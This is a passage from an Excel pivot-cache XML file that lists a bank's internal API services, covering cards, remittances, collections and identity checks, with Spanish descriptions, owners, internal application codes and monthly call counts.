    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2982"/>
    <n v="2780"/>
    <n v="2424"/>
    <n v="2132"/>
    <n v="2346"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Calcular Operacion Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Calcular Operación Divisas se encargará de realizar validación de la operación, previo a completar la operación de divisas el sistema expondrá al usuario la información del a negociación que está realizando a través de este servicio._x000a_El servicio cuenta con las operaciones de calculo de compra y calculo de venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Calculo Cuota Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Capacidad que permiten el cálculo de cuota para créditos no desembolsados y de recálculo para créditos desembolsados."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0102001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cambiar Clave SVE"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permitir generar las claves de los usuarios que interactúan en la Empresa con el producto a través de la Sucursal Virtual, mejorando el servicio cliente en forma segura."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cambiar Primera Segunda Clave SVP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permitir que un cliente de Filiales del Exterior (Panamá/Cayman, Miami), pueda cambiar su Primera ó Segunda Clave desde la Sucursal Virtual Personas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cambio Plan Cuenta"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Cambio Plan Cuentas permite cambiar el plan de una cuenta de ahorros o corriente, desde y hacia planes que no tengan restricción como origen y destino._x000a__x000a_"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Cancelar Canal SVE"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir Cancelar el canal (SVE) Sucursal Virtual Empresa al cliente."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-19T01:12:37"/>
    <s v="Cards"/>
    <n v="210"/>
    <s v="Card - Credit information"/>
    <n v="210"/>
    <s v="credit-card-infomation"/>
    <s v="Permite consultar información de una tarjeta de crédito como:  listar las tarjetas de crédito que tiene  un usuario con información básica de  contacto,  y permite consular los movimientos de una tarjeta especí­fica."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Tarjetas"/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <n v="1260"/>
    <n v="427"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-02-27T15:25:48"/>
    <s v="Cards"/>
    <n v="301"/>
    <s v="Card - Credit information"/>
    <n v="301"/>
    <s v="credit-card-infomation"/>
    <s v="Conoce a profundiad el detalle de información del proximo pago de tu cliente."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <s v="ConsultaInformacionTarjetaCredito/V1.1"/>
    <m/>
    <s v="TMP SOPORTE APP_lgcorrg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-19T01:12:37"/>
    <s v="Cards"/>
    <n v="210"/>
    <s v="Card - Credit Payment Information"/>
    <n v="110"/>
    <s v="card-credit-payment-information"/>
    <s v="Esta API permite consultar la información de pago de las tarjetas de crédito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaInformacionTarjetaCredito/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-07-19T01:12:37"/>
    <s v="Cards"/>
    <n v="210"/>
    <s v="Card - Credit Payments"/>
    <n v="110"/>
    <s v="card-credit-payments"/>
    <s v="Permite realizar el pago de una tarjeta de crédito"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="GestionPagoTarjetaCredito/V1.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001 _x000d__x000a_ APOLO_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-02-27T15:25:48"/>
    <s v="Cards"/>
    <n v="301"/>
    <s v="Card - Credit Transactions"/>
    <n v="301"/>
    <s v="card-credit-transactions"/>
    <s v="Retorna el listado de transacciones realizadas por medio de una tarjeta."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <s v="ConsultaMovimientosTarjetaCredito/V1.0"/>
    <m/>
    <s v="TMP SOPORTE APP_lgcorrg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-02-27T15:25:48"/>
    <s v="Cards"/>
    <n v="301"/>
    <s v="Card - Customer Cards"/>
    <n v="101"/>
    <s v="card-customer-cards"/>
    <s v="Te ayudamos a conocer todas las tarjetas que tu cliente posee"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <s v="ConsultaInformacionTarjetaCredito/V1.1"/>
    <m/>
    <s v="TMP SOPORTE APP_lgcorrg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T11:37:14"/>
    <s v="Card Payment Execution"/>
    <n v="101"/>
    <s v="Card Payment Execution - Credit Cards"/>
    <n v="101"/>
    <s v="card-payment-execution-credit-cards"/>
    <s v="Esta Api contiene capacidades que permiten realizar diferentes afectaciones monetarias sobre una tarjeta de crédito. Tales afectaciones incluyen: - Pagar tarjeta de crédito con débito a cuenta - Pagar tarjeta de crédito de terceros - Pagar tarjeta de crédito con cuentas de otros bancos"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="AfectacionesMonetariasTarjetasCredito/V1.0"/>
    <m/>
    <s v="ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ PagoTDCWompi_AW1405001"/>
    <n v="132"/>
    <n v="108"/>
    <n v="49"/>
    <n v="25490"/>
    <n v="23469"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-04T12:06:00"/>
    <s v="Cards"/>
    <n v="111"/>
    <s v="Cards - Credit Card Obligations"/>
    <n v="102"/>
    <s v="cards-credit-card-obligations"/>
    <s v="La API permite a los consumidores listar las tarjetas del cliente que cuentan con obligaciones, usando el tipo y níºmero de documento como datos de entrada. Se define que un cliente tiene una obligación cuando presenta algíºn valor en la deuda total, ya sea en pesos y dólares"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasPYME/V1.0_x000a_ConsultaTarjetasCredito/V1.0"/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3959"/>
    <n v="3054"/>
    <n v="2848"/>
    <n v="9892"/>
    <n v="45574"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-06-02T16:43:32"/>
    <s v="Cards"/>
    <n v="111"/>
    <s v="Cards - Debit Cards"/>
    <n v="100"/>
    <s v="cards-debit-cards"/>
    <s v="La API permite a los consumidores gestionar novedades sobre las tarjetas débito Maestro o Masterdebit. "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <s v="GestionTarjetasDebito/V1.0"/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Carga De Archivos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene la funcionalidad de permitirá realizar la carga de los archivos (ejemplo: Novedades, Cobro y Facturación, etc.), inicialmente de los pagos realizados por un cliente a través de los diferentes canales de un convenio."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos, Pagos o Gobierno e Impuestos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="GDE _x000d__x000a_PSE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-25T12:41:03"/>
    <s v="Case Root Cause Analysis"/>
    <n v="101"/>
    <s v="Case Root Cause Analysis - Tipology Manager"/>
    <n v="101"/>
    <s v="case-root-cause-analysis-tipology-manager"/>
    <s v="Este servicio permite identificar la causa de la necesidad de un cliente, a través del análisis y la  Administración de tipologí­as, subtipologias, causalidades, sub causalidades, asociadas a un catálogo de productos, servicios y/o canales previamente identificados. permitiendo identificar el nivel de atención para dar solución a las solicitudes de un Cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001"/>
    <n v="168"/>
    <n v="210"/>
    <n v="173"/>
    <n v="376"/>
    <n v="2432"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2018-03-02T16:28:29"/>
    <s v="Channels"/>
    <n v="100"/>
    <s v="Channel - Service Points"/>
    <n v="100"/>
    <s v="channel-service-points"/>
    <s v="El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud)."/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Servicios Switch y Telefonica"/>
    <s v="Distribución Fisica"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="GeorreferenciacionAPI"/>
    <s v="Vinculación Digital _x000d__x000a_ CHATBOT _x000d__x000a_ Dummy _x000d__x000a_ BC Portal de Contenido_AW1218001"/>
    <n v="20028"/>
    <n v="16725"/>
    <n v="41850"/>
    <n v="76931"/>
    <n v="70855"/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-17T09:44:38"/>
    <s v="Channel Activity Analysis"/>
    <n v="100"/>
    <s v="Channel Activity Analysis - SimCard"/>
    <n v="100"/>
    <s v="channel-activity-analysis-simcard"/>
    <s v="Servicio que permite realizar la consulta de la íºltima reexpedición de una simcard, por medio del níºmero celular asociado. Servicio configurado para los operadores Movistar y Claro."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionSimCard/V1.0"/>
    <m/>
    <s v="PortalAutogestionPyme_AW1287"/>
    <n v="38"/>
    <n v="20"/>
    <n v="45"/>
    <n v="16"/>
    <n v="10"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-20T15:22:40"/>
    <s v="Channel Commission"/>
    <n v="110"/>
    <s v="Channel Commission - Customer Transactions"/>
    <n v="110"/>
    <s v="channel-commission-customer-transactions"/>
    <s v="Permite la consulta de las comisiones que se cobran en los canales digitales banco en base a la transacción que el cliente realiza desde un canal, a la que se asigna un código especifico parametrizado desde ITC como por ejemplo:  - Transferencia a otro banco  - Transferencias de fondos  - Transferencia a cuenta Nequi"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ msitccheckcost_NU0215001"/>
    <n v="10152"/>
    <n v="50987"/>
    <n v="85928"/>
    <n v="71603"/>
    <n v="69343"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Channel Management"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Administración Mensajes transversales_x000a_Gestion Parámetros Tipos de Documento y Marcas de Cuenta"/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <s v="Galatea"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Channel Transaction Validations"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Microservicio encargado de administrar los Canales y Transacciones del D2B y sus respectivos estados, permite encender y apagar Canales y Transacciones en tiempo real."/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <s v="Galatea"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T17:04:45"/>
    <s v="Collections Agreement"/>
    <n v="121"/>
    <s v="Collection Agreements - Account Collection"/>
    <n v="100"/>
    <s v="collection-agreements-account-collection"/>
    <s v="El API Collection Agreement - Collection Account permite consultar información de la cuenta del recaudo"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaCuentaRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_AW1176 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ Horus_AW1258011"/>
    <m/>
    <m/>
    <n v="306"/>
    <n v="59"/>
    <n v="1639"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T17:04:45"/>
    <s v="Collections Agreement"/>
    <n v="121"/>
    <s v="Collection Agreements - Information"/>
    <n v="112"/>
    <s v="collection-agreements-information"/>
    <s v="El API Collection Agreement permitirá listar y validar la información detallada de los convenios de recaudos. Está operación es vital para el funcionamiento de recaudos, por que contienen los parametros que determina su comportamiento y sus condiciones"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaConvenioRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_AW1176 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ Horus_AW1258011"/>
    <n v="15271"/>
    <n v="16380"/>
    <n v="19590"/>
    <n v="14146"/>
    <n v="38255"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Comprar Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite registrar en el sistema de Tesorería del banco una negociación de divisas realizada entre el banco y el cliente. "/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="MUREX_MUREX-CORE_AW0434001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Confirmar Identidad Persona En Data Credito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras. El proveedor del servicio es quien valida y aprueba las preguntas."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW0748001 _x000d__x000a_AW1312001 _x000d__x000a_NU0034001 _x000d__x000a_AW1281003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Confirmar Identidad Persona En Data Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1097001 _x000d__x000a_AW0939 _x000d__x000a_NU0034001 _x000d__x000a_AW1281003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignment - Modify Remittance"/>
    <n v="300"/>
    <s v="consignment-modify-remittance"/>
    <s v="API que permite modificar una remesa enviada."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="GestionRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="15211"/>
    <n v="13997"/>
    <n v="12962"/>
    <n v="13394"/>
    <n v="14329"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Authorization"/>
    <n v="200"/>
    <s v="consignments-authorization"/>
    <s v="Proveedor de OAuth2 para autenticación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="2"/>
    <n v="1589"/>
    <n v="80523"/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Cancel Remittance"/>
    <n v="200"/>
    <s v="consignment-cancel-remittance"/>
    <s v="API que permite la cancelación de una remesa."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="GestionRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="28831"/>
    <n v="26056"/>
    <n v="26160"/>
    <n v="28561"/>
    <n v="31609"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Consult Remittance"/>
    <n v="200"/>
    <s v="consignments-consult-remittance"/>
    <s v="API que permite consultar el estado de la remesa."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="3485738"/>
    <n v="3255172"/>
    <n v="3390772"/>
    <n v="3152973"/>
    <n v="3622791"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Exchange Rates Query"/>
    <n v="200"/>
    <s v="consignments-exchange-rates-query"/>
    <s v="API para consultar las tasas de cambio de USD a COP pactadas entre el banco y la remesadora en fechas determinadas"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="GestionRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="309850"/>
    <n v="299634"/>
    <n v="290293"/>
    <n v="303099"/>
    <n v="356297"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Send Remittance"/>
    <n v="300"/>
    <s v="consignments-send-remittance"/>
    <s v="API que permite enviar remesas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
